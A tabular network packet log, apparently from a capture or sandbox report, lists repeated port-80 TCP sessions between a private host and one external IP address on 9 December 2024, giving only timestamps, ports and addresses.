Dec 9, 2024 08:52:07.215326071 CET	80	49757	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:07.215514898 CET	49757	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:07.215516090 CET	49757	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:07.334847927 CET	80	49757	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:07.352544069 CET	49773	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:07.472069025 CET	80	49773	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:07.472148895 CET	49773	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:07.474473000 CET	49773	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:07.593738079 CET	80	49773	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:07.593801975 CET	49773	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:07.713109016 CET	80	49773	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:09.028433084 CET	80	49773	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:09.028476954 CET	80	49773	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:09.028697968 CET	49773	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:09.028697968 CET	49773	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:09.148041010 CET	80	49773	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:09.165867090 CET	49775	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:09.285156012 CET	80	49775	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:09.285222054 CET	49775	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:09.287523031 CET	49775	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:09.406713963 CET	80	49775	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:09.406949043 CET	49775	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:09.526225090 CET	80	49775	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:10.848207951 CET	80	49775	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:10.848504066 CET	49775	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:10.848512888 CET	80	49775	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:10.848565102 CET	49775	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:10.967758894 CET	80	49775	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:10.991194963 CET	49781	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:11.110614061 CET	80	49781	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:11.110851049 CET	49781	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:11.112812042 CET	49781	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:11.232234001 CET	80	49781	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:11.232352972 CET	49781	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:11.351896048 CET	80	49781	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:13.029788017 CET	80	49781	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:13.029982090 CET	80	49781	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:13.030024052 CET	49781	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:13.030381918 CET	49781	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:13.150006056 CET	80	49781	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:13.181689978 CET	49787	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:13.301065922 CET	80	49787	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:13.301239967 CET	49787	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:13.303529024 CET	49787	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:13.422915936 CET	80	49787	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:13.423060894 CET	49787	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:13.542501926 CET	80	49787	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:15.246920109 CET	80	49787	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:15.246979952 CET	80	49787	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:15.247122049 CET	49787	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:15.260915995 CET	49787	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:15.380232096 CET	80	49787	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:15.400160074 CET	49793	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:15.522597075 CET	80	49793	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:15.526633024 CET	49793	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:15.562992096 CET	49793	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:15.682233095 CET	80	49793	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:15.682605028 CET	49793	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:15.801888943 CET	80	49793	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:16.935839891 CET	80	49793	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:16.935934067 CET	80	49793	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:16.935957909 CET	49793	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:16.935980082 CET	49793	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:17.055207014 CET	80	49793	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:17.082063913 CET	49799	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:17.201328993 CET	80	49799	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:17.202620029 CET	49799	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:17.204816103 CET	49799	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:17.324110031 CET	80	49799	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:17.325150013 CET	49799	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:17.444416046 CET	80	49799	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:21.764257908 CET	80	49799	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:21.764409065 CET	49799	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:21.764471054 CET	80	49799	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:21.764508009 CET	49799	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:21.883707047 CET	80	49799	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:21.912451029 CET	49811	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:22.032701969 CET	80	49811	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:22.032865047 CET	49811	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:22.035048008 CET	49811	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:22.154263973 CET	80	49811	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:22.154447079 CET	49811	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:22.273720980 CET	80	49811	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:23.587380886 CET	80	49811	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:23.587495089 CET	49811	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:23.587500095 CET	80	49811	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:23.587542057 CET	49811	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:23.706861973 CET	80	49811	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:23.727650881 CET	49818	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:23.847054958 CET	80	49818	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:23.847173929 CET	49818	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:23.852942944 CET	49818	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:23.972436905 CET	80	49818	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:23.972500086 CET	49818	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:24.091895103 CET	80	49818	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:25.264223099 CET	80	49818	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:25.264365911 CET	49818	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:25.264421940 CET	80	49818	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:25.264468908 CET	49818	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:25.383816004 CET	80	49818	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:25.412224054 CET	49823	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:25.531580925 CET	80	49823	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:25.531738997 CET	49823	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:25.533881903 CET	49823	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:25.653213024 CET	80	49823	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:25.653268099 CET	49823	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:25.772703886 CET	80	49823	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:27.091386080 CET	80	49823	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:27.091494083 CET	80	49823	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:27.091552973 CET	49823	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:27.092504978 CET	49823	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:27.211831093 CET	80	49823	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:27.375600100 CET	49828	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:27.494978905 CET	80	49828	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:27.495063066 CET	49828	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:27.501702070 CET	49828	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:27.621062040 CET	80	49828	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:27.621177912 CET	49828	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:27.740521908 CET	80	49828	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:28.905251026 CET	80	49828	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:28.905267954 CET	80	49828	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:28.905374050 CET	49828	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:28.905412912 CET	49828	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:29.025072098 CET	80	49828	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:29.068289042 CET	49833	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:29.188755989 CET	80	49833	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:29.188868046 CET	49833	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:29.190929890 CET	49833	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:29.310337067 CET	80	49833	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:29.310465097 CET	49833	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:29.429862022 CET	80	49833	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:30.743460894 CET	80	49833	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:30.743480921 CET	80	49833	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:30.743566990 CET	49833	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:30.749839067 CET	49833	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:30.869215965 CET	80	49833	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:30.901065111 CET	49836	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:31.020530939 CET	80	49836	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:31.020704031 CET	49836	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:31.022804022 CET	49836	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:31.142020941 CET	80	49836	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:31.142638922 CET	49836	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:31.261920929 CET	80	49836	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:32.430124998 CET	80	49836	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:32.430346012 CET	80	49836	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:32.430393934 CET	49836	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:32.464466095 CET	49836	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:32.583828926 CET	80	49836	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:32.602932930 CET	49841	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:32.722343922 CET	80	49841	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:32.722450018 CET	49841	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:32.724689007 CET	49841	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:32.844144106 CET	80	49841	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:32.844274998 CET	49841	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:32.963669062 CET	80	49841	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:34.283608913 CET	80	49841	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:34.283631086 CET	80	49841	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:34.283694029 CET	49841	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:34.283919096 CET	49841	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:34.403160095 CET	80	49841	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:34.431513071 CET	49848	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:34.551079035 CET	80	49848	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:34.551357985 CET	49848	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:34.553539991 CET	49848	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:34.672863007 CET	80	49848	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:34.672995090 CET	49848	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:34.792432070 CET	80	49848	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:36.102579117 CET	80	49848	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:36.102689981 CET	49848	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:36.102737904 CET	80	49848	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:36.102777958 CET	49848	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:36.222043037 CET	80	49848	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:36.238668919 CET	49854	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:36.358139992 CET	80	49854	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:36.358323097 CET	49854	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:36.360389948 CET	49854	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:36.479809999 CET	80	49854	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:36.479932070 CET	49854	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:36.599334955 CET	80	49854	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:37.817862034 CET	80	49854	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:37.818425894 CET	49854	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:37.818717003 CET	80	49854	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:37.818922997 CET	49854	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:37.937695980 CET	80	49854	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:37.973074913 CET	49859	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:38.092452049 CET	80	49859	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:38.092796087 CET	49859	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:38.095002890 CET	49859	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:38.214368105 CET	80	49859	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:38.214536905 CET	49859	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:38.333977938 CET	80	49859	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:39.497653008 CET	80	49859	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:39.497811079 CET	49859	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:39.500253916 CET	80	49859	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:39.500315905 CET	49859	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:39.617089987 CET	80	49859	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:39.631226063 CET	49863	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:39.750535011 CET	80	49863	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:39.750628948 CET	49863	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:39.752880096 CET	49863	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:39.872241020 CET	80	49863	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:39.872509003 CET	49863	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:39.992153883 CET	80	49863	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:41.152460098 CET	80	49863	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:41.152587891 CET	80	49863	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:41.152631044 CET	49863	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:41.152667046 CET	49863	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:41.271991968 CET	80	49863	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:41.287450075 CET	49867	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:41.407694101 CET	80	49867	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:41.407785892 CET	49867	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:41.409809113 CET	49867	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:41.529230118 CET	80	49867	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:41.529352903 CET	49867	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:41.648672104 CET	80	49867	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:42.964554071 CET	80	49867	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:42.964665890 CET	80	49867	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:42.964741945 CET	49867	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:42.964801073 CET	49867	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:43.084244967 CET	80	49867	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:43.104454041 CET	49873	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:43.224029064 CET	80	49873	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:43.224150896 CET	49873	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:43.227236986 CET	49873	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:43.346813917 CET	80	49873	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:43.346920967 CET	49873	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:43.466227055 CET	80	49873	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:44.776232004 CET	80	49873	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:44.776288033 CET	80	49873	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:44.776413918 CET	49873	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:44.776513100 CET	49873	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:44.895864010 CET	80	49873	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:44.913305998 CET	49879	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:45.032720089 CET	80	49879	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:45.032897949 CET	49879	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:45.035027981 CET	49879	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:45.154429913 CET	80	49879	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:45.154565096 CET	49879	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:45.274235010 CET	80	49879	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:46.592494965 CET	80	49879	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:46.592547894 CET	80	49879	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:46.592674971 CET	49879	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:46.592731953 CET	49879	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:46.712064028 CET	80	49879	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:46.741947889 CET	49885	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:46.861290932 CET	80	49885	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:46.861433029 CET	49885	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:46.863600016 CET	49885	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:46.983052015 CET	80	49885	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:46.983185053 CET	49885	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:47.102931023 CET	80	49885	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:48.268328905 CET	80	49885	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:48.268433094 CET	80	49885	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:48.268573999 CET	49885	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:48.268610954 CET	49885	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:48.387942076 CET	80	49885	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:48.415131092 CET	49888	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:48.536098003 CET	80	49888	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:48.537234068 CET	49888	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:48.539252043 CET	49888	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:48.658571959 CET	80	49888	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:48.658726931 CET	49888	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:48.778111935 CET	80	49888	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:50.978399992 CET	80	49888	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:50.978503942 CET	49888	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:50.978569031 CET	80	49888	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:50.978619099 CET	49888	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:51.098177910 CET	80	49888	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:51.115389109 CET	49896	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:51.234834909 CET	80	49896	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:51.234973907 CET	49896	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:51.237061977 CET	49896	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:51.356970072 CET	80	49896	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:51.358824968 CET	49896	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:51.478090048 CET	80	49896	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:52.650873899 CET	80	49896	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:52.650984049 CET	80	49896	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:52.651034117 CET	49896	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:52.651375055 CET	49896	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:52.770278931 CET	80	49896	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:52.786223888 CET	49900	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:52.905798912 CET	80	49900	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:52.905955076 CET	49900	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:52.908112049 CET	49900	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:53.027426958 CET	80	49900	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:53.027579069 CET	49900	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:53.146955967 CET	80	49900	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:54.731537104 CET	80	49900	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:54.731672049 CET	80	49900	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:54.731708050 CET	49900	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:54.731755018 CET	49900	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:54.851047039 CET	80	49900	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:54.867702007 CET	49906	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:54.987010956 CET	80	49906	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:54.987135887 CET	49906	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:54.989228964 CET	49906	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:55.108503103 CET	80	49906	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:55.108776093 CET	49906	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:55.228079081 CET	80	49906	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:56.395785093 CET	80	49906	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:56.395833969 CET	80	49906	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:56.395944118 CET	49906	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:56.395992041 CET	49906	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:56.515239000 CET	80	49906	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:56.549093008 CET	49911	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:56.668487072 CET	80	49911	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:56.668579102 CET	49911	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:56.670968056 CET	49911	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:56.790288925 CET	80	49911	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:56.790419102 CET	49911	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:56.909746885 CET	80	49911	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:58.223550081 CET	80	49911	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:58.223752022 CET	80	49911	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:58.223872900 CET	49911	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:58.223872900 CET	49911	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:58.343275070 CET	80	49911	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:58.369246006 CET	49917	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:58.488537073 CET	80	49917	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:58.488660097 CET	49917	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:58.490883112 CET	49917	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:58.611356974 CET	80	49917	94.156.177.41	192.168.2.6
Dec 9, 2024 08:52:58.611498117 CET	49917	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:52:58.730906963 CET	80	49917	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:00.043214083 CET	80	49917	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:00.043296099 CET	80	49917	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:00.043307066 CET	49917	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:00.043363094 CET	49917	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:00.162703037 CET	80	49917	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:00.178266048 CET	49924	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:00.297492027 CET	80	49924	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:00.297667980 CET	49924	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:00.300306082 CET	49924	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:00.419594049 CET	80	49924	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:00.419701099 CET	49924	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:00.539016008 CET	80	49924	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:01.856334925 CET	80	49924	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:01.856404066 CET	80	49924	94.156.177.41	192.168.2.6
Dec 9, 2024 08:53:01.856477022 CET	49924	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:01.856515884 CET	49924	80	192.168.2.6	94.156.177.41
Dec 9, 2024 08:53:01.975965023 CET	80	49924	94.156.177.41	192.168.2.6
